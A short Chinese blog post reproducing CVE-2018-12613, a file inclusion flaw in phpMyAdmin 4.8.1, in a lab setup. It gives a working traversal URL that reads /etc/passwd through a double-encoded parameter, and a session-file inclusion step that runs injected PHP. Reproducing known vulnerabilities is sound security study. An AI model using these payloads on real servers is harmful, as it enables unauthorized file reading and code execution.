phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)


phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)

phpMyAdmin 是一套开源的、基于 Web 的 MySQL 数据库管理工具。其 index.php 中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

漏洞复现

访问 http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd,可见 /etc/passwd 被读取,说明文件包含漏洞存在:

利用方式也比较简单,可以执行一下 SELECT '<?=phpinfo()?>'; ,然后查看自己的 sessionid (cookie 中 phpMyAdmin 的值),然后包含 session 文件即可:


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
phpmyadmin scripts/setup.php 反序列化漏洞 phpmyadmin scripts/setup.php 反序列化漏洞
phpmyadmin scripts/setup.php 反序列化漏洞phpmyadmin 2.x 版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 漏洞复现发送如下数据包,即可读取 /etc/passwd:
2019-03-04
下一篇 
PostgreSQL 提权漏洞(CVE-2018-1058) PostgreSQL 提权漏洞(CVE-2018-1058)
PostgreSQL 提权漏洞(CVE-2018-1058)PostgreSQL 是一款关系型数据库。其 9.3 到 10 版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。 漏洞复
2019-03-03
  目录